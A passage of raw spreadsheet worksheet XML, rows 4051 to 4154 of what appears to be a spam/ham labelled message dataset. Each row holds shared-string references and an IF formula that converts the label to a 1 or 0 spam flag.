    <row r="4051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4051" t="s">
        <v>9099</v>
      </c>
      <c r="B4051" t="s">
        <v>5294</v>
      </c>
      <c r="C4051" s="1">
        <f>IF(B4051="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4052" t="s">
        <v>9100</v>
      </c>
      <c r="B4052" t="s">
        <v>5294</v>
      </c>
      <c r="C4052" s="1">
        <f>IF(B4052="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4053" t="s">
        <v>9101</v>
      </c>
      <c r="B4053" t="s">
        <v>5294</v>
      </c>
      <c r="C4053" s="1">
        <f>IF(B4053="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4054" t="s">
        <v>9102</v>
      </c>
      <c r="B4054" t="s">
        <v>5294</v>
      </c>
      <c r="C4054" s="1">
        <f>IF(B4054="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4055" t="s">
        <v>9103</v>
      </c>
      <c r="B4055" t="s">
        <v>5294</v>
      </c>
      <c r="C4055" s="1">
        <f>IF(B4055="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4056" t="s">
        <v>9104</v>
      </c>
      <c r="B4056" t="s">
        <v>5294</v>
      </c>
      <c r="C4056" s="1">
        <f>IF(B4056="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4057" t="s">
        <v>9105</v>
      </c>
      <c r="B4057" t="s">
        <v>5294</v>
      </c>
      <c r="C4057" s="1">
        <f>IF(B4057="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4058" t="s">
        <v>9106</v>
      </c>
      <c r="B4058" t="s">
        <v>5294</v>
      </c>
      <c r="C4058" s="1">
        <f>IF(B4058="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4059" t="s">
        <v>9107</v>
      </c>
      <c r="B4059" t="s">
        <v>5294</v>
      </c>
      <c r="C4059" s="1">
        <f>IF(B4059="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4060" t="s">
        <v>9108</v>
      </c>
      <c r="B4060" t="s">
        <v>5297</v>
      </c>
      <c r="C4060" s="1">
        <f>IF(B4060="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4061" t="s">
        <v>9109</v>
      </c>
      <c r="B4061" t="s">
        <v>5297</v>
      </c>
      <c r="C4061" s="1">
        <f>IF(B4061="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4062" t="s">
        <v>9110</v>
      </c>
      <c r="B4062" t="s">
        <v>5294</v>
      </c>
      <c r="C4062" s="1">
        <f>IF(B4062="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4063" t="s">
        <v>9111</v>
      </c>
      <c r="B4063" t="s">
        <v>5294</v>
      </c>
      <c r="C4063" s="1">
        <f>IF(B4063="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4064" t="s">
        <v>9112</v>
      </c>
      <c r="B4064" t="s">
        <v>5294</v>
      </c>
      <c r="C4064" s="1">
        <f>IF(B4064="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4065" t="s">
        <v>9113</v>
      </c>
      <c r="B4065" t="s">
        <v>5294</v>
      </c>
      <c r="C4065" s="1">
        <f>IF(B4065="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4066" t="s">
        <v>9114</v>
      </c>
      <c r="B4066" t="s">
        <v>5294</v>
      </c>
      <c r="C4066" s="1">
        <f>IF(B4066="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4067" t="s">
        <v>9115</v>
      </c>
      <c r="B4067" t="s">
        <v>5294</v>
      </c>
      <c r="C4067" s="1">
        <f>IF(B4067="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4068" t="s">
        <v>9116</v>
      </c>
      <c r="B4068" t="s">
        <v>5297</v>
      </c>
      <c r="C4068" s="1">
        <f>IF(B4068="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4069" t="s">
        <v>9117</v>
      </c>
      <c r="B4069" t="s">
        <v>5297</v>
      </c>
      <c r="C4069" s="1">
        <f>IF(B4069="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4070" t="s">
        <v>9118</v>
      </c>
      <c r="B4070" t="s">
        <v>5294</v>
      </c>
      <c r="C4070" s="1">
        <f>IF(B4070="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4071" t="s">
        <v>9119</v>
      </c>
      <c r="B4071" t="s">
        <v>5294</v>
      </c>
      <c r="C4071" s="1">
        <f>IF(B4071="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4072" t="s">
        <v>9120</v>
      </c>
      <c r="B4072" t="s">
        <v>5294</v>
      </c>
      <c r="C4072" s="1">
        <f>IF(B4072="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4073" t="s">
        <v>9121</v>
      </c>
      <c r="B4073" t="s">
        <v>5297</v>
      </c>
      <c r="C4073" s="1">
        <f>IF(B4073="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4074" t="s">
        <v>9122</v>
      </c>
      <c r="B4074" t="s">
        <v>5294</v>
      </c>
      <c r="C4074" s="1">
        <f>IF(B4074="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4075" t="s">
        <v>9123</v>
      </c>
      <c r="B4075" t="s">
        <v>5294</v>
      </c>
      <c r="C4075" s="1">
        <f>IF(B4075="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4076" t="s">
        <v>6849</v>
      </c>
      <c r="B4076" t="s">
        <v>5294</v>
      </c>
      <c r="C4076" s="1">
        <f>IF(B4076="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4077" t="s">
        <v>9124</v>
      </c>
      <c r="B4077" t="s">
        <v>5297</v>
      </c>
      <c r="C4077" s="1">
        <f>IF(B4077="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4078" t="s">
        <v>9125</v>
      </c>
      <c r="B4078" t="s">
        <v>5294</v>
      </c>
      <c r="C4078" s="1">
        <f>IF(B4078="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4079" t="s">
        <v>9126</v>
      </c>
      <c r="B4079" t="s">
        <v>5294</v>
      </c>
      <c r="C4079" s="1">
        <f>IF(B4079="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4080" t="s">
        <v>9127</v>
      </c>
      <c r="B4080" t="s">
        <v>5294</v>
      </c>
      <c r="C4080" s="1">
        <f>IF(B4080="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4081" t="s">
        <v>9128</v>
      </c>
      <c r="B4081" t="s">
        <v>5294</v>
      </c>
      <c r="C4081" s="1">
        <f>IF(B4081="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4082" t="s">
        <v>9129</v>
      </c>
      <c r="B4082" t="s">
        <v>5294</v>
      </c>
      <c r="C4082" s="1">
        <f>IF(B4082="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4083" t="s">
        <v>5432</v>
      </c>
      <c r="B4083" t="s">
        <v>5294</v>
      </c>
      <c r="C4083" s="1">
        <f>IF(B4083="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4084" t="s">
        <v>9130</v>
      </c>
      <c r="B4084" t="s">
        <v>5294</v>
      </c>
      <c r="C4084" s="1">
        <f>IF(B4084="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4085" t="s">
        <v>9131</v>
      </c>
      <c r="B4085" t="s">
        <v>5294</v>
      </c>
      <c r="C4085" s="1">
        <f>IF(B4085="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4086" t="s">
        <v>9132</v>
      </c>
      <c r="B4086" t="s">
        <v>5297</v>
      </c>
      <c r="C4086" s="1">
        <f>IF(B4086="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4087" t="s">
        <v>9133</v>
      </c>
      <c r="B4087" t="s">
        <v>5294</v>
      </c>
      <c r="C4087" s="1">
        <f>IF(B4087="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4088" t="s">
        <v>9134</v>
      </c>
      <c r="B4088" t="s">
        <v>5297</v>
      </c>
      <c r="C4088" s="1">
        <f>IF(B4088="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4089" t="s">
        <v>9135</v>
      </c>
      <c r="B4089" t="s">
        <v>5294</v>
      </c>
      <c r="C4089" s="1">
        <f>IF(B4089="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4090" t="s">
        <v>9136</v>
      </c>
      <c r="B4090" t="s">
        <v>5294</v>
      </c>
      <c r="C4090" s="1">
        <f>IF(B4090="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4091" t="s">
        <v>9137</v>
      </c>
      <c r="B4091" t="s">
        <v>5297</v>
      </c>
      <c r="C4091" s="1">
        <f>IF(B4091="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4092" t="s">
        <v>9138</v>
      </c>
      <c r="B4092" t="s">
        <v>5294</v>
      </c>
      <c r="C4092" s="1">
        <f>IF(B4092="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4093" t="s">
        <v>9139</v>
      </c>
      <c r="B4093" t="s">
        <v>5294</v>
      </c>
      <c r="C4093" s="1">
        <f>IF(B4093="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4094" t="s">
        <v>9140</v>
      </c>
      <c r="B4094" t="s">
        <v>5294</v>
      </c>
      <c r="C4094" s="1">
        <f>IF(B4094="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4095" t="s">
        <v>9141</v>
      </c>
      <c r="B4095" t="s">
        <v>5294</v>
      </c>
      <c r="C4095" s="1">
        <f>IF(B4095="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4096" t="s">
        <v>9142</v>
      </c>
      <c r="B4096" t="s">
        <v>5294</v>
      </c>
      <c r="C4096" s="1">
        <f>IF(B4096="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4097" t="s">
        <v>9143</v>
      </c>
      <c r="B4097" t="s">
        <v>5294</v>
      </c>
      <c r="C4097" s="1">
        <f>IF(B4097="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4098" t="s">
        <v>9144</v>
      </c>
      <c r="B4098" t="s">
        <v>5294</v>
      </c>
      <c r="C4098" s="1">
        <f>IF(B4098="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4099" t="s">
        <v>9145</v>
      </c>
      <c r="B4099" t="s">
        <v>5294</v>
      </c>
      <c r="C4099" s="1">
        <f>IF(B4099="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4100" t="s">
        <v>9146</v>
      </c>
      <c r="B4100" t="s">
        <v>5294</v>
      </c>
      <c r="C4100" s="1">
        <f>IF(B4100="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4101" t="s">
        <v>9147</v>
      </c>
      <c r="B4101" t="s">
        <v>5294</v>
      </c>
      <c r="C4101" s="1">
        <f>IF(B4101="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4102" t="s">
        <v>9148</v>
      </c>
      <c r="B4102" t="s">
        <v>5297</v>
      </c>
      <c r="C4102" s="1">
        <f>IF(B4102="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4103" t="s">
        <v>6474</v>
      </c>
      <c r="B4103" t="s">
        <v>5294</v>
      </c>
      <c r="C4103" s="1">
        <f>IF(B4103="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4104" t="s">
        <v>6867</v>
      </c>
      <c r="B4104" t="s">
        <v>5297</v>
      </c>
      <c r="C4104" s="1">
        <f>IF(B4104="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4105" t="s">
        <v>9149</v>
      </c>
      <c r="B4105" t="s">
        <v>5294</v>
      </c>
      <c r="C4105" s="1">
        <f>IF(B4105="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4106" t="s">
        <v>9150</v>
      </c>
      <c r="B4106" t="s">
        <v>5294</v>
      </c>
      <c r="C4106" s="1">
        <f>IF(B4106="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4107" t="s">
        <v>9151</v>
      </c>
      <c r="B4107" t="s">
        <v>5294</v>
      </c>
      <c r="C4107" s="1">
        <f>IF(B4107="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4108" t="s">
        <v>9152</v>
      </c>
      <c r="B4108" t="s">
        <v>5297</v>
      </c>
      <c r="C4108" s="1">
        <f>IF(B4108="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4109" t="s">
        <v>9153</v>
      </c>
      <c r="B4109" t="s">
        <v>5294</v>
      </c>
      <c r="C4109" s="1">
        <f>IF(B4109="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4110" t="s">
        <v>9154</v>
      </c>
      <c r="B4110" t="s">
        <v>5294</v>
      </c>
      <c r="C4110" s="1">
        <f>IF(B4110="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4111" t="s">
        <v>9155</v>
      </c>
      <c r="B4111" t="s">
        <v>5294</v>
      </c>
      <c r="C4111" s="1">
        <f>IF(B4111="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4112" t="s">
        <v>9156</v>
      </c>
      <c r="B4112" t="s">
        <v>5297</v>
      </c>
      <c r="C4112" s="1">
        <f>IF(B4112="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4113" t="s">
        <v>9157</v>
      </c>
      <c r="B4113" t="s">
        <v>5294</v>
      </c>
      <c r="C4113" s="1">
        <f>IF(B4113="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4114" t="s">
        <v>9158</v>
      </c>
      <c r="B4114" t="s">
        <v>5294</v>
      </c>
      <c r="C4114" s="1">
        <f>IF(B4114="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4115" t="s">
        <v>9159</v>
      </c>
      <c r="B4115" t="s">
        <v>5294</v>
      </c>
      <c r="C4115" s="1">
        <f>IF(B4115="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4116" t="s">
        <v>9160</v>
      </c>
      <c r="B4116" t="s">
        <v>5294</v>
      </c>
      <c r="C4116" s="1">
        <f>IF(B4116="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4117" t="s">
        <v>5544</v>
      </c>
      <c r="B4117" t="s">
        <v>5294</v>
      </c>
      <c r="C4117" s="1">
        <f>IF(B4117="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4118" t="s">
        <v>9161</v>
      </c>
      <c r="B4118" t="s">
        <v>5294</v>
      </c>
      <c r="C4118" s="1">
        <f>IF(B4118="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4119" t="s">
        <v>9162</v>
      </c>
      <c r="B4119" t="s">
        <v>5294</v>
      </c>
      <c r="C4119" s="1">
        <f>IF(B4119="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4120" t="s">
        <v>9163</v>
      </c>
      <c r="B4120" t="s">
        <v>5294</v>
      </c>
      <c r="C4120" s="1">
        <f>IF(B4120="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4121" t="s">
        <v>9164</v>
      </c>
      <c r="B4121" t="s">
        <v>5294</v>
      </c>
      <c r="C4121" s="1">
        <f>IF(B4121="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4122" t="s">
        <v>9165</v>
      </c>
      <c r="B4122" t="s">
        <v>5294</v>
      </c>
      <c r="C4122" s="1">
        <f>IF(B4122="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4123" t="s">
        <v>9166</v>
      </c>
      <c r="B4123" t="s">
        <v>5294</v>
      </c>
      <c r="C4123" s="1">
        <f>IF(B4123="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4124" t="s">
        <v>9167</v>
      </c>
      <c r="B4124" t="s">
        <v>5294</v>
      </c>
      <c r="C4124" s="1">
        <f>IF(B4124="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4125" t="s">
        <v>9168</v>
      </c>
      <c r="B4125" t="s">
        <v>5294</v>
      </c>
      <c r="C4125" s="1">
        <f>IF(B4125="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4126" t="s">
        <v>9169</v>
      </c>
      <c r="B4126" t="s">
        <v>5294</v>
      </c>
      <c r="C4126" s="1">
        <f>IF(B4126="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4127" t="s">
        <v>9170</v>
      </c>
      <c r="B4127" t="s">
        <v>5297</v>
      </c>
      <c r="C4127" s="1">
        <f>IF(B4127="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4128" t="s">
        <v>5376</v>
      </c>
      <c r="B4128" t="s">
        <v>5294</v>
      </c>
      <c r="C4128" s="1">
        <f>IF(B4128="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4129" t="s">
        <v>7679</v>
      </c>
      <c r="B4129" t="s">
        <v>5294</v>
      </c>
      <c r="C4129" s="1">
        <f>IF(B4129="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4130" t="s">
        <v>9171</v>
      </c>
      <c r="B4130" t="s">
        <v>5294</v>
      </c>
      <c r="C4130" s="1">
        <f>IF(B4130="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4131" t="s">
        <v>9172</v>
      </c>
      <c r="B4131" t="s">
        <v>5294</v>
      </c>
      <c r="C4131" s="1">
        <f>IF(B4131="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4132" t="s">
        <v>9173</v>
      </c>
      <c r="B4132" t="s">
        <v>5294</v>
      </c>
      <c r="C4132" s="1">
        <f>IF(B4132="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4133" t="s">
        <v>9174</v>
      </c>
      <c r="B4133" t="s">
        <v>5294</v>
      </c>
      <c r="C4133" s="1">
        <f>IF(B4133="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4134" t="s">
        <v>9175</v>
      </c>
      <c r="B4134" t="s">
        <v>5297</v>
      </c>
      <c r="C4134" s="1">
        <f>IF(B4134="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4135" t="s">
        <v>9176</v>
      </c>
      <c r="B4135" t="s">
        <v>5294</v>
      </c>
      <c r="C4135" s="1">
        <f>IF(B4135="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4136" t="s">
        <v>9177</v>
      </c>
      <c r="B4136" t="s">
        <v>5294</v>
      </c>
      <c r="C4136" s="1">
        <f>IF(B4136="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4137" t="s">
        <v>9178</v>
      </c>
      <c r="B4137" t="s">
        <v>5294</v>
      </c>
      <c r="C4137" s="1">
        <f>IF(B4137="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4138" t="s">
        <v>9179</v>
      </c>
      <c r="B4138" t="s">
        <v>5294</v>
      </c>
      <c r="C4138" s="1">
        <f>IF(B4138="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4139" t="s">
        <v>9180</v>
      </c>
      <c r="B4139" t="s">
        <v>5294</v>
      </c>
      <c r="C4139" s="1">
        <f>IF(B4139="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4140" t="s">
        <v>6541</v>
      </c>
      <c r="B4140" t="s">
        <v>5294</v>
      </c>
      <c r="C4140" s="1">
        <f>IF(B4140="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4141" t="s">
        <v>9181</v>
      </c>
      <c r="B4141" t="s">
        <v>5294</v>
      </c>
      <c r="C4141" s="1">
        <f>IF(B4141="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4142" t="s">
        <v>9182</v>
      </c>
      <c r="B4142" t="s">
        <v>5294</v>
      </c>
      <c r="C4142" s="1">
        <f>IF(B4142="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4143" t="s">
        <v>9183</v>
      </c>
      <c r="B4143" t="s">
        <v>5294</v>
      </c>
      <c r="C4143" s="1">
        <f>IF(B4143="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4144" t="s">
        <v>9184</v>
      </c>
      <c r="B4144" t="s">
        <v>5297</v>
      </c>
      <c r="C4144" s="1">
        <f>IF(B4144="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4145" t="s">
        <v>9185</v>
      </c>
      <c r="B4145" t="s">
        <v>5294</v>
      </c>
      <c r="C4145" s="1">
        <f>IF(B4145="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4146" t="s">
        <v>9186</v>
      </c>
      <c r="B4146" t="s">
        <v>5294</v>
      </c>
      <c r="C4146" s="1">
        <f>IF(B4146="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4147" t="s">
        <v>9187</v>
      </c>
      <c r="B4147" t="s">
        <v>5294</v>
      </c>
      <c r="C4147" s="1">
        <f>IF(B4147="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4148" t="s">
        <v>9188</v>
      </c>
      <c r="B4148" t="s">
        <v>5294</v>
      </c>
      <c r="C4148" s="1">
        <f>IF(B4148="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4149" t="s">
        <v>9189</v>
      </c>
      <c r="B4149" t="s">
        <v>5297</v>
      </c>
      <c r="C4149" s="1">
        <f>IF(B4149="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4150" t="s">
        <v>9190</v>
      </c>
      <c r="B4150" t="s">
        <v>5294</v>
      </c>
      <c r="C4150" s="1">
        <f>IF(B4150="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4151" t="s">
        <v>9191</v>
      </c>
      <c r="B4151" t="s">
        <v>5294</v>
      </c>
      <c r="C4151" s="1">
        <f>IF(B4151="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4152" t="s">
        <v>9192</v>
      </c>
      <c r="B4152" t="s">
        <v>5294</v>
      </c>
      <c r="C4152" s="1">
        <f>IF(B4152="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4153" t="s">
        <v>9193</v>
      </c>
      <c r="B4153" t="s">
        <v>5294</v>
      </c>
      <c r="C4153" s="1">
        <f>IF(B4153="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4154" t="s">
        <v>7419</v>
      </c>
      <c r="B4154" t="s">
        <v>5297</v>
      </c>
      <c r="C4154" s="1">
        <f>IF(B4154="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
